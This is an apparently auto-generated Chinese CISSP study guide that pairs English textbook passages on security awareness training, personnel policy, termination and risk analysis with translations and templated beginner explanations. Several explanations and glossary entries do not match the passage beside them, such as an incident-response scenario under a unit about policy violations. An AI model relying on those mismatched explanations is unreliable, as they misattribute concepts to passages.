安全倡导者往往是非安全岗位的员工,他们主动承担起责任, 鼓励他人支持并采纳更完善的安全实践和行为。 安全倡导者常见于软件开发领 域,但这一概念对任何部门的任何员工团队都具有参考价值。 通过游戏化,安全意识和培训通常可以得到改善。 游戏化是一种通过将游戏的 常见元素整合到其他活动中(如安全合规和行为改变)来鼓励合规性和参与度 的方法。 这可以包括奖励合规行为,以及可能惩罚违规行为。 许多游戏元素 (源自纸牌游戏、棋盘游戏、体育、电子游戏等)可以整合到安全培训和推广 中,例如得分、获得成就或徽章、与他人竞争/合作、遵循一套共同/标准规则、 设定明确目标、寻求奖励、构建群体故事/体验,以及避免陷阱

小白解释

场景先行:你是公司的安全负责人,正在读第 216 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 216 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 78 / PDF P217

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

or negative game events. Well-applied game dynamics can result in improved worker engagement with training, an increase in organizational application of lessons, expansion of the comprehension of application of concepts, more efficient workflow, integration of more group activities such as crowdsourcing and brainstorming, increased knowledge retention, and a reduction of worker apathy. In addition to gamification, ways to improve security training include capture-the-flag drills, phishing simulations, computer-based training (CBT), and role-based training, among many others. Effectiveness Evaluation It is also important to perform periodic content reviews of all training materials.

Reviews help ensure that the training materials and presentation stay in line with business goals, organizational mission, and security objectives. This periodic evaluation of training materials also provides the opportunity to adjust focus, add/remove topics (especially related to emerging technologies and trends), and integrate new training techniques into the courseware. The Exam Outline objective 1.12.2 gives examples of emerging technologies and trends that should be integrated into training materials. These examples are cryptocurrency and blockchain (which are covered in Chapters 7 and 9) and artificial intelligence (Al) (which is covered in Chapter 17).

These are only a few of the new concepts that every organization should be addressing as part of their security management processes, including training personnel on how to use, handle, avoid, or detect. Additionally, new bold and subtle methods and techniques to present awareness and training should be implemented to keep the content fresh and relevant. Without periodic reviews for content relevancy, materials will become stale and workers will likely resort to making up their own guidelines and procedures. It is the responsibility of the security governance team to establish security rules as well as provide training and education to further the implementation of those rules.

Troubleshooting personnel issues should include verifying that all personnel have attended awareness training on standard foundational security

中文直译 / 整理

或负面游戏事件。 恰当应用的游戏机制可以提升员工对培训的参与度、增强组 织对培训内容的应用、扩大对概念应用的理解、提高工作效率、整合更多群体 活动(如众包和头脑风暴)、提升知识留存率,并减少员工的冷漠态度。 除了 游戏化之外,改善安全培训的方法还包括夺旗演练、钓鱼模拟、计算机辅助培 训(CBT)和基于角色的培训等。 有效性评估 定期审查所有培训材料的内容也非常重要。 审查有助于确保培训材料和演示 内容与业务目标、组织使命和安全目标保持一致。 这种对培训材料的定期评 估还提供了调整重点、添加/删除主题(特别是与新兴技术和趋势相关的主题) 以及将新的培训方法整合到课程中的机会。 考试大纲目标 1.12.2 提供了应整合到培训材料中的新兴技术和趋势示 例。 这些示例包括加密货币和区块链(在第 7 章 和 第 9 章中涵盖)以及人 工智能(AI)(在第 17 章中涵盖)。 这些只是每个组织在其安全管理流程 中(包括培训人员如何使用、处理、避免或检测)应关注的少数新概念。 此外,还应实施新颖且微妙的呈现意识和培训的方法与技术,以保持内容的新 鲜感和相关性。 如果没有定期审查内容的相关性,材料将变得过时,员工可能 会自行制定指南和程序。

安全治理团队有责任制定安全规则,并提供培训和教 育,以进一步推动这些规则的实施。 处理人员问题时,应核实所有人员是否已参加有关标准基础安全的意识培训

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
保留期限 保留期限规定数据、日志或记录要保存多久。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 79 / PDF P218

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

behaviors and requirements, evaluating the access and activity logs of users, and determining whether violations were intentional, coerced, accidental, or due to ignorance. A policy violation occurs when a user breaks a rule. Users must be trained on the organization's policies and know their specific responsibilities with regard to abiding by those security rules. If a violation occurs, an internal investigation should evaluate whether it was an accident or an intentional event. If accidental, the worker should be trained on how to avoid the accident in the future, and new countermeasures may need to be implemented.

If intentional, the severity of the issue may dictate a range of responses, including retraining, reassignment, and termination. An example of a policy violation is the distribution of an internal company memo to external entities via a social network posting. Depending on the content of the memo, this could be a minor violation (such as posting a memo due to humorous or pointless content according to the worker) or a major issue (such as posting a memo that discloses a company secret or private information related to customers). Company policy violations are not always the result of an accident or oversight on the part of the worker, nor are they always an intentional malicious choice.

In fact, many internal breaches of company security are the result of intentional manipulation by malicious third parties. Training and awareness program effectiveness evaluation should take place on an ongoing or continuous basis. Never assume that just because a worker was marked as attending or completing a training event they actually learned anything or will be changing their behavior. Some means of verification should be used to measure whether the training is beneficial or a waste of time and resources. In some circumstances, a quiz or test can be administered to workers immediately after a training session.

A follow-up quiz should be performed three to six months later to see if they retained the information presented in the training. Event and incident logs should be reviewed for the rate of occurrences of security violations due to employee actions and behaviors to see if there is any noticeable difference in the rate of occurrence or trends of incidents before and after a training presentation. Good training (and teachable employees) would be confirmed with a marked difference in user behaviors, especially a reduction of security infractions. High scores on subsequent security quizzes months later demonstrate that security concepts are retained. A combination of these processes of

中文直译 / 整理

行为与要求,评估用户的访问和活动日志,并确定违规行为是故意的、被迫的、 偶然的,还是由于无知造成的。 当用户违反规定时,会发生政策违规行为。 用户必须接受组织政策的培训,并 了解其在遵守这些安全规则方面的具体职责。 如果发生违规行为,应进行内部 调查,以评估该行为是意外还是故意事件。 如果是意外,应对员工进行培训, 使其了解如何在未来避免类似事故,并可能需要实施新的应对措施。 如果是故 意行为,问题的严重性可能决定一系列应对措施,包括重新培训、调岗和解雇。 政策违规的一个例子是通过社交媒体发布将公司内部备忘录分发给外部实体。 根据备忘录的内容,这可能构成轻微违规(例如,员工因认为备忘录内容幽 默或无意义而发布),也可能构成重大问题(例如,发布泄露公司机密或客 户私人信息的备忘录)。 公司政策违规并不总是员工的意外或疏忽所致,也不总是出于故意的恶意选择。 事实上,许多公司安全内部泄露事件是由恶意第三方故意操纵造成的。 培训与意识计划的有效性评估应持续进行。 绝不能仅因员工被标记为参加了或 完成了某次培训,就认为他们真正学到了东西或会改变行为。 应采用某种验证 手段,以衡量培训是否有效,还是浪费了时间和资源。

在某些情况下,可在培 训结束后立即对员工进行测验。 应在三到六个月后进行后续测验,以查看他们 是否保留了培训中所传授的信息。 应审查事件和事故日志,查看因员工行为导 致的安全违规事件发生率,以确定在培训前后事件发生率或趋势是否有明显变 化。 良好的培训(以及可教育的员工)应表现为员工行为的显著差异,尤其是 安全违规行为的减少。 数月后安全测验的高分表明安全概念得到了保留。 这些 评估流程的结合

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 80 / PDF P219

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

evaluation can help determine if a training or awareness program is being effective and is reducing the security incident rate and related response and management costs. A well-designed, engaging, and successful security training program should result in a measurable reduction in employeerelated security incident management costs, hopefully far exceeding the cost of the training program itself. This would, therefore, be a good return on security investment. Summary When designing and deploying security solutions, you need to protect your environment from potential human threats.

The aspects of secure hiring practices, defining roles, setting policies, following standards, reviewing guidelines, detailing procedures, performing risk management, providing awareness training, and cultivating management planning all contribute to protecting assets. Secure hiring practices require detailed job descriptions. Job descriptions are used as a guide for selecting candidates and properly evaluating them for a position. Job responsibilities are the specific work tasks an employee is required to perform on a regular basis.

Employment candidate screening, background checks, reference checks, education verification, and security clearance validation are essential elements in proving that a candidate is adequate, qualified, and trustworthy for a secured position. Onboarding involves integrating a new hire into the organization, which includes organizational socialization and orientation. When a new employee is hired, they should sign an employment agreement/contract and possibly a nondisclosure agreement (NDA). These documents define the responsibilities and legal liabilities of the relationship between the employee and the organization.

Throughout the employment lifetime of personnel, managers should regularly review or audit the job descriptions, work tasks, privileges, and responsibilities for every staff member. For some industries, mandatory vacations may be needed. Collusion and other privilege abuses can be reduced through strict monitoring of special privileges. Offboarding is the removal of an employee's identity from the IAM system, or it may be a part of the process of employee transfer to another division of the

中文直译 / 整理

有助于确定培训或意识计划是否有效,是否降低了安全事件发生率及相关响应 与管理成本。 一个设计良好、引人入胜且成功的安全培训计划,应能带来员工 相关安全事件管理成本的可衡量降低,最好远超培训计划本身的成本。 因此, 这将是一项良好的安全投资回报。 摘要 在设计和部署安全解决方案时,您需要保护您的环境免受潜在的人为威胁。 安全招聘实践、定义角色、制定政策、遵循标准、审查指南、详细说明流程、 实施风险管理、提供意识培训以及培养管理规划,都有助于保护资产。 安全招聘实践要求详细的职位描述。 职位描述用作选拔候选人并对其职位进行 适当评估的指南。 工作职责是员工需要定期执行的具体工作任务。 雇佣候选人筛选、背景调查、推荐信核查、学历验证和安全许可验证是证明 候选人具备胜任安全职位的适当性、资质和可信度的关键要素。 入职流程涉及将新员工融入组织,包括组织社会化和入职引导。 当聘用新员工 时,应签署雇佣协议/合同,可能还需签署保密协议(NDA)。 这些文件界定了 员工与组织之间关系的责任和法律责任。 在员工的整个雇佣期间,管理人员应定期审查或审计每位员工的工作描述、工 作任务、权限和职责。 对于某些行业,可能需要强制休假。

通过严格监控特殊 权限,可以减少串通和其他权限滥用行为。 离职流程是指从IAM系统中移除员工的身份,或可能是员工调至公司其他部门流程 的一部分。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 81 / PDF P220

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

organization. A termination policy is needed to protect an organization and its remaining employees. The termination procedure should include an exit interview, reminder of NDAs, return of company property, and disabling of network access. Vendor, consultant, and contractor controls (i.e., an SLA) are used to define the levels of performance, expectation, compensation, and consequences for external entities, persons, or organizations. Compliance is the act of conforming to or adhering to rules, policies, regulations, standards, or requirements. Compliance is an important concern for security governance. The primary goal of risk management is to reduce risk to an acceptable level.

Determining this level depends on the organization, the value of its assets, and the size of its budget. Risk analysis/assessment is the process by which risk management is achieved and includes inventorying assets, analyzing an environment for threats, and evaluating each risk as to its likelihood of occurring and the cost of the resulting damage. Risk response is the assessing of the cost of various countermeasures for each risk and creating a cost/benefit report for safeguards to present to upper management. Social engineering is a form of attack that exploits human nature and human behavior.

Social engineering attacks take two primary forms: convincing someone to perform an unauthorized operation or convincing someone to reveal confidential information. The most effective defense against social engineering attacks is user education and awareness training. The common social engineering principles are authority, intimidation, consensus, scarcity, familiarity, trust, and urgency. Eliciting information is the activity of gathering or collecting information from systems or people.

Social engineering attacks include phishing, spear phishing, business email compromise (BEC), whaling, smishing, vishing, spam, shoulder surfing, invoice scams, hoaxes, impersonation, masquerading, tailgating, piggybacking, baiting, dumpster diving, identity fraud, typosquatting, and influence campaigns. For a security solution to be successfully implemented, user behavior must change. Behavior modification involves some level of learning on the part of the user. There are three commonly recognized learning levels: awareness, training, and education.

中文直译 / 整理

组织。 需要制定离职政策以保护组织及其剩余员工。 离职程序应包括离职面谈、 提醒遵守保密协议、归还公司财产以及禁用网络访问。 供应商、顾问和承包商控制(即服务等级协议)用于定义外部实体、个人或组 织的绩效水平、期望、补偿和后果。 合规是指遵守规则、政策、法规、标准或要求的行为。 合规是安全治理的重要 关注点。 风险管理的主要目标是将风险降低到可接受的水平。 确定这一水平取决于组织、 其资产的价值以及预算规模。 风险分析/评估是实现风险管理的过程,包括资产 清点、分析环境中的威胁,并评估每项风险的发生可能性及其导致的损害成本。 风险应对是对每项风险的各种应对措施的成本进行评估,并制定成本效益报告, 以提交给高层管理层。 社会工程是一种利用人性和人类行为的攻击形式。 社会工程攻击主要有两种形 式:说服某人执行未经授权的操作,或说服某人泄露机密信息。 防范社会工程 攻击最有效的手段是用户教育和意识培训。 常见的社会工程学原则包括权威、恐吓、共识、稀缺性、熟悉度、信任和紧 迫感。 信息收集是从系统或人员处获取或收集信息的活动。

社会工程学攻击 包括钓鱼、鱼叉式钓鱼、商业邮件泄露(BEC)、鲸钓、短信钓鱼、语音钓 鱼、垃圾邮件、肩窥、发票诈骗、恶作剧、冒充、伪装、尾随、搭便车、诱 饵、翻找垃圾、身份欺诈、域名抢注和影响活动。 要成功实施安全解决方案,用户行为必须改变。 行为改变涉及用户一定程度 的学习。 通常认可的三个学习层次为:意识、培训和教育。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 82 / PDF P221

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Security-focused awareness and training programs should be reassessed and revised regularly. Some security awareness and training programs can benefit from security champions or gamification. Study Essentials Understand the security implications of hiring new employees. To properly plan for security, you must have standards in place for job descriptions, job classification, work tasks, job responsibilities, prevention of collusion, candidate screening, background checks, security clearances, employment agreements, and nondisclosure agreements. By deploying such mechanisms, you ensure that new hires are aware of the required security standards, thus protecting your organization's assets.

Understand onboarding and offboarding. Onboarding is the process of adding new employees to the organization using socialization and orientation. Offboarding is the removal of an employee's identity from the IAM system once that person has left the organization. Know the principle of least privilege. The principle of least privilege states that users should be granted the minimum amount of access necessary for them to complete their required work tasks or job responsibilities. Know about employee oversight. Throughout the employment lifetime of personnel, managers should regularly review or audit the job descriptions, work tasks, privileges, and responsibilities for every staff member.

Know why mandatory vacations are necessary. Mandatory vacations of one to two weeks are used to audit and verify the work tasks and privileges of employees. This often results in easy detection of abuse, fraud, or negligence. Know about UBA and UEBA. User behavior analytics (UBA) and user and entity behavior analytics (UEBA) are the concepts of analyzing the behavior of users, subjects, visitors, customers, etc. for some specific goal or purpose. Understand employee transfers. Personnel transfers may be treated as a termination/rehire rather than a personnel move. This depends on the organization's policies and the means they have determined to best manage this change.

Some of the elements that go into making the decision as to which procedure to use include whether the same user account will be

中文直译 / 整理

以安全为重点的意识和培训计划应定期重新评估和修订。 一些安全意识和培训 计划可以从安全倡导者或游戏化中受益。 学习必备 了解雇佣新员工的安全影响。 To properly plan for securit y, you must have standards in place for job 描述、职位分类、工作任务、职位职责、防止 串通、候选人筛选、背景调查、安全许可, 雇佣协议和保密协议。 通过部署这些机制,您可确保新员工了解所需的安全 标准,从而保护组织的资产。 了解入职和离职。 入职是通过社会化和导向将新员工加入组织的过程 ,离职是在员工离开组织后,将其身份从IAM系统中移除。 了解最小权限原则。 最小权限原则指出,应仅授予用户完成其所需工作任务或职 责所必需的最低限度访问权限。 了解员工监督。 在员工的整个雇佣期间,管理者应定期审查或审计每位员工的工 作描述、工作任务、权限和职责。 了解强制休假的必要性。 强制休假一至两周用于审计和核实员工的工作任务和权 限,这通常能轻松发现滥用、欺诈或疏忽行为。 了解UBA和UEBA。

用户行为分析(UBA)和用户与实体行为分析(UEBA) 是指为实现特定目标或目的而分析用户、主体、访客、客户等的行为。 了解员工调动。 员工调动可能被视为终止再雇佣,而非人员调动。 这取决于组织的 政策以及他们为最好管理这一变更所确定的方式。 在决定使用哪种程序时,需要考 虑的因素包括:是否保留同一用户账户、其权限是否需要调整、其新的工作职责是 否与之前职位相似,以及新职位是否因审计目的需要一个“清空”账户。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 83 / PDF P222

第 222 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

retained, if their clearance will be adjusted, if their new work responsibilities are similar to the previous position, and if a “clean slate” account is required for auditing purposes in the new job position. Be able to explain proper termination policies. A termination policy defines the procedure for terminating employees. It should include items such as always having a witness, disabling the employee's network access, and performing an exit interview. A termination policy should also include escorting the terminated employee off the premises and requiring the return of security tokens and badges and company property. Be able to define overall risk management.

The process of identifying factors that could damage or disclose data, evaluating those factors in light of data value and countermeasure cost, and implementing cost-effective solutions for mitigating or reducing risk is known as risk management. By performing risk management, you lay the foundation for reducing risk overall. Understand risk analysis and the key elements involved. Risk analysis is the process by which upper management is provided with details to make decisions about which risks are to be mitigated, which should be transferred, and which should be accepted.

To fully evaluate risks and subsequently take the proper precautions, you must analyze the following: assets, asset valuation, threats, vulnerability, exposure, risk, realized risk, safeguards, countermeasures, attacks, and breaches. Know how to evaluate threats. Threats can originate from numerous sources, including IT, humans, and nature. Threat assessment should be performed as a team effort to provide the widest range of perspectives. By fully evaluating risks from all angles, you reduce your system's vulnerability. Understand qualitative risk analysis. Qualitative risk analysis is based more on scenarios than calculations.

Exact dollar figures are not assigned to possible losses; instead, threats are ranked on a scale to evaluate their risks, costs, and effects. Such an analysis assists those responsible for creating proper risk management policies. Understand quantitative risk analysis. Quantitative risk analysis focuses on hard values and percentages. A complete quantitative analysis is not possible because of intangible aspects of risk. The process involves valuing assets and identifying threats and then determining a threat's potential frequency and the resulting damage, which leads to the risk response tasks of the cost/benefit analysis of safeguards.

中文直译 / 整理

保留,其权限是否需要调整,其新的工作职责是否与之前职位相似,以及新职 位是否因审计目的需要一个“清空”账户。 能够解释正确的终止政策。 终止政策定义了终止员工的程序。 它应包括以下内 容:始终有见证人在场、禁用员工的网络访问权限、进行离职面谈。 终止政策 还应包括护送被终止员工离开办公场所,并要求归还安全令牌、工牌和公司财 产。 能够定义整体风险管理。 风险管理是指识别可能损害或泄露数据的因素,根据 数据价值和应对措施成本评估这些因素,并实施成本效益高的解决方案以减轻或 降低风险的过程。 通过实施风险管理,您将为整体降低风险奠定基础。 理解风险分析及其涉及的关键要素。 风险分析是为高层管理提供详细信息,以 便决定哪些风险需要减轻、哪些需要转移、哪些需要接受的过程。 要全面评估 风险并采取适当的预防措施,您必须分析以下内容:资产、资产估值、威胁、 脆弱性、暴露、风险、已实现风险、防护措施、应对措施、攻击和泄露。 了解如何评估威胁。 威胁可能来自多种来源,包括IT、人类和自然。 威胁评 估应作为团队合作进行,以提供最广泛的视角。 通过全面评估所有角度的风险, 您可以降低系统的脆弱性。 理解定性风险分析。

定性风险分析更侧重于情景而非计算。 不会为可能的损失 分配确切的美元金额; 相反,威胁会根据一个尺度进行排名,以评估其风险、成 本和影响。 这种分析有助于负责制定适当风险管理政策的人员。 理解定量风险分析。 定量风险分析侧重于硬性数值和百分比。 由于风险的无形 方面,无法完成完整的定量分析。 该过程涉及评估资产、识别威胁,然后确定 威胁的潜在发生频率及由此造成的损害,从而引出安全措施的成本/效益分析 这一风险应对任务。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 222 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 84 / PDF P223

第 223 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

